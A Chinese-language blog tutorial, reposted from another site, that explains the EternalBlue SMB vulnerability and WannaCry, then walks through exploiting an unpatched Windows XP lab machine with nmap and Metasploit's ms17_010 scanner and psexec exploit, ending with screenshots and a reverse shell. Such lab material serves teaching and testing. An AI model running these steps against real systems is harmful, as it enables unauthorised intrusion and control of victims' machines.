本文转自行云博客https://www.xy586.top/

什么是永恒之蓝

永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

这里说到了SMB协议，那么这又是啥玩意

SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。

攻击机：192.168.232.131 （Kali安装Metaploit工具）

靶机：192.168.232.128 （windows xp未打永恒之蓝补丁且关闭防火墙）

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本漏洞需要用到kali自带的Metasploit渗透工具，关于该工具的使用，之后再细讲。

Metasploit框架（简称MSF）是一个开源工具，旨在方便渗透测试，它是由Ruby程序语言编 写的模板化框架，具有很好的扩展性，便于渗透测试人员开发，使用定制的工具模板。

该工具有六个模块，分别为辅助模块(auxiliary)、渗透攻击模块 (exploits）、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模 块(nops）、编码器模块(encoders)，其中msf为总模块，其他均为分支模 块。

进入正题，打开我们的kali攻击机，启动我们的Metasploit渗透工具 msfconsole 打开另一个窗口，扫描一下靶机是否开启了445端口以及查看版本信息 nmap -sV -p 445 192.168.232.128 得到靶机的445端口信息，以及系统版本

利用msf的auxiliary模块进行漏洞验证 search ms17-010 这里我们可以使用auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞 use auxiliary/scanner/smb/smb_ms17_010 然后查看具体需要配置的东西 show options 设置攻击目标及端口 set rhosts 192.168.232.128 set rport 445 配置完后使用run命令开始测试，发现可以利用该漏洞 现在可以利用攻击模块对其进行渗透，试了多个模块后，得出exploit/windows/smb/ms17_010_psexec该漏洞可用

开始设置靶机的ip，端口以及攻击机的ip

配置完输入run进行攻击 这里需要多试几次，可能是玄学吧，成功进入

查看系统信息 捕捉屏幕screenshot 反弹shell 后续的事情就可以自由发挥了